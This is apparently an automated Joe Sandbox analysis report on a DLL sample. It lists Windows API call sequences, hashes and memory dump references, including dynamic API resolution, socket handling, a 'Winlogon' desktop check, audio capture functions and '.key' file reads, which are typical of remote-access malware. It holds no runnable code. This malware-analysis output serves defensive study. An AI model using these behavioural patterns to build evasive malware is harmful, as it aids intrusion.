                                                  • Opcode ID: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                  • Instruction ID: a991dfd3618a091cf8bced06e1e14c92db115e9186b32fce010f6c8dd9d2edbc
                                                  • Opcode Fuzzy Hash: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                  • Instruction Fuzzy Hash: 1AE09B35256621BBF22167149CC5FAB2678FB8DBD0F150205F608961C0CB609C0141AD
                                                  APIs
                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                  • CancelIo.KERNEL32(?), ref: 10004F57
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                  • closesocket.WS2_32(?), ref: 10004F73
                                                  • SetEvent.KERNEL32(?), ref: 10004F80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                  • String ID:
                                                  • API String ID: 1486965892-0
                                                  • Opcode ID: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                  • Instruction ID: 7b5b089ba35ea6fa801320ef26441ee9f6e0eb5430616a3962164302b2279ec7
                                                  • Opcode Fuzzy Hash: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                  • Instruction Fuzzy Hash: 81F01275214711AFE6248F64CC88FD777A8BF45711F108B1DF6AE462D0CB70A4488755
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: KERNEL32.dll$WideCharToMultiByte
                                                  • API String ID: 2574300362-2634761684
                                                  • Opcode ID: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                  • Instruction ID: 11a70ebfe6614348c4627575f714f8bac5bc37e03cfb6a5d127c6c7937c6bce2
                                                  • Opcode Fuzzy Hash: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                  • Instruction Fuzzy Hash: 2541257250421A8FDB18CE2CC8549AFBBD5FBC4354F154A2DF9A6D3280DA70AD0ACB91
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100108E8
                                                  • Sleep.KERNEL32(000004D2), ref: 1001098C
                                                    • Part of subcall function 10010790: CloseHandle.KERNEL32(00000000), ref: 10010893
                                                  • DeleteFileA.KERNEL32(?), ref: 1001094D
                                                    • Part of subcall function 10010790: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100107C2
                                                    • Part of subcall function 10010790: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10010837
                                                    • Part of subcall function 10010790: GetFileSize.KERNEL32(00000000,00000000), ref: 10010846
                                                    • Part of subcall function 10010790: #823.MFC42(00000000), ref: 1001084F
                                                    • Part of subcall function 10010790: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10010862
                                                    • Part of subcall function 10010790: #825.MFC42(00000000), ref: 1001088A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$DirectorySystem$#823#825CloseCreateDeleteHandleReadSizeSleep
                                                  • String ID: .key
                                                  • API String ID: 3115437274-343438762
                                                  • Opcode ID: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                  • Instruction ID: 6c8f07c80318120aef5ae7d44ab656afb01d193eb1c0889538d79381634ba695
                                                  • Opcode Fuzzy Hash: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                  • Instruction Fuzzy Hash: 1E210775B046540BE719D634889076A7BC5FBC1330F58031AF6978B2C2CEF898888755
                                                  APIs
                                                  • SHGetSpecialFolderPathA.SHELL32 ref: 10007877
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 100078ED
                                                  • CloseHandle.KERNEL32(00000000), ref: 10007917
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateFileFolderHandlePathSpecial
                                                  • String ID: p
                                                  • API String ID: 3113538180-2181537457
                                                  • Opcode ID: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                  • Instruction ID: fb9301c769810b0d049b01ddbf7940714647d0c15556b6550ef7852ede3c4a13
                                                  • Opcode Fuzzy Hash: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                  • Instruction Fuzzy Hash: CB210A716006041FE718CA389C46BEB76C5FBC4330F588B2DF96ACB2D1DAF489098750
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutWrite), ref: 1000141E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001425
                                                    • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                    • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                    • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                    • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                    • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                    • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: WINMM.dll$waveOutWrite
                                                  • API String ID: 2574300362-665518901
                                                  • Opcode ID: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                  • Instruction ID: 94ba89aa586d5954ea77ca1480e0960dd09743874461cbc46f4ab6b518109010
                                                  • Opcode Fuzzy Hash: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                  • Instruction Fuzzy Hash: C211A0762043048FEB08DF68D8C89A6BBE5FB88380B15855DFE468B346DB71EC01DB20
                                                  APIs
                                                  • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,00000065,?,00000001,00000001,00000001), ref: 10009DAA
                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000065,?,00000001,00000001,00000001), ref: 10009DC6
                                                  • SetFilePointer.KERNEL32 ref: 10009DE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Pointer$Write
                                                  • String ID: p
                                                  • API String ID: 3847668363-2181537457
                                                  • Opcode ID: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                  • Instruction ID: 1a9338856e1de5b0d7c3f8fb7aa3c1ae0f192f66fa92f10234f7d2b8d6558fe2
                                                  • Opcode Fuzzy Hash: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                  • Instruction Fuzzy Hash: 811127B5608341ABE210DB28CC85F9BB7E9FBD8714F108A0CF99893280D674A9058BA1
                                                  APIs
                                                    • Part of subcall function 10001B80: InitializeCriticalSection.KERNEL32(00000001,?,100048DA,00000000), ref: 10001B98
                                                  • WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateCriticalEventInitializeSectionStartup
                                                  • String ID: a$m
                                                  • API String ID: 1327880603-1958708294
                                                  • Opcode ID: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                  • Instruction ID: fb24ae0377e714457c16f4a52ba150758387226036423692d2cdc97d3624b5ca
                                                  • Opcode Fuzzy Hash: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                  • Instruction Fuzzy Hash: 87118B741087809EE321DB28C856BD6BBE4BF19B50F048A5DE4EE472C1DBB96008CB23
                                                  APIs
                                                  • #823.MFC42(00000014,0036EE80,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BA4,?), ref: 100251B7
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 100251DB
                                                  • wsprintfA.USER32 ref: 10025201
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823GlobalMemoryStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 1983843647-2766056989
                                                  • Opcode ID: 941b2e290d305a81d138fb57f18e5039d5d390a7e43d59a1874b90e869f07c80
                                                  • Instruction ID: 06fa81e96df19cb4dd16af0bc8ecd3e14d8d5308ec12a8ab899a057605995e8c
                                                  • Opcode Fuzzy Hash: 941b2e290d305a81d138fb57f18e5039d5d390a7e43d59a1874b90e869f07c80
                                                  • Instruction Fuzzy Hash: C6F0A7B96003106FE7109B1CDC45B9B76D5FBC0340F444839F94997351D634E91846F7
                                                  APIs
                                                  • #823.MFC42(00000014,753F0450,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BC0,00000000), ref: 10025D57
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 10025D7B
                                                  • wsprintfA.USER32 ref: 10025DA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823GlobalMemoryStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 1983843647-2766056989
                                                  • Opcode ID: d294a44f7225d540f6ccf3b3d64ff7ad2105ff8ffbbe894dce9e1f0f24db2d57
                                                  • Instruction ID: 3f4cf3f15d770bf68782a656647274a6e0c86debdf8329e8f1eec7df296df01e
                                                  • Opcode Fuzzy Hash: d294a44f7225d540f6ccf3b3d64ff7ad2105ff8ffbbe894dce9e1f0f24db2d57
                                                  • Instruction Fuzzy Hash: 4FF0A7B96002106FE7109B1CDC45B9B7A95FBC0350F448839F94997351D534E91846E7
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 1002C581
                                                  • GetThreadDesktop.USER32(00000000,?,100175AC), ref: 1002C588
                                                    • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                    • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                  • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 1002C5B4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$AddressCurrentDesktopLibraryLoadMessagePostProc
                                                  • String ID: Winlogon
                                                  • API String ID: 133172028-744610081
                                                  • Opcode ID: c97b5bdebda83fbe03fd115723357bb3a5dbb0126c6472e95b4541de8eb79df7
                                                  • Instruction ID: d72d2dfb5afce3fe9c88a57ae67a6aedd033381f380b1957d7131a4ed4c822df
                                                  • Opcode Fuzzy Hash: c97b5bdebda83fbe03fd115723357bb3a5dbb0126c6472e95b4541de8eb79df7
                                                  • Instruction Fuzzy Hash: FFE0CD77E41A7417FA6167B87D4AFDA32089F50740F850670F50999583E654FFC141D1
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CreateEventA$KERNEL32.dll
                                                  • API String ID: 2574300362-2476775342
                                                  • Opcode ID: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                  • Instruction ID: 81657b418f3b05921348bdbd49973478ffcbca97394684bddc953fa459c75907
                                                  • Opcode Fuzzy Hash: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                  • Instruction Fuzzy Hash: 6CE08C756403206BE360DFA89C49F867A98EF48701F04881EF349E7281CAB0A840CB68
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CloseHandle,00000000,1000F45B,00000000,00000000,1001DDE5), ref: 10010A23
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10010A2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CloseHandle$KERNEL32.dll
                                                  • API String ID: 2574300362-2295661983
                                                  • Opcode ID: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                  • Instruction ID: cf30f3b007e41bfee70c41d9c59be6cb1b231e04fc18b526b816a338234f57c5
                                                  • Opcode Fuzzy Hash: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                  • Instruction Fuzzy Hash: F9C012B94112215FD724EFA4EC4C8D63A58FF44301348494DF55993211CF745840CBA0
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 1002C05A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C061
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: KERNEL32.dll$lstrlenA
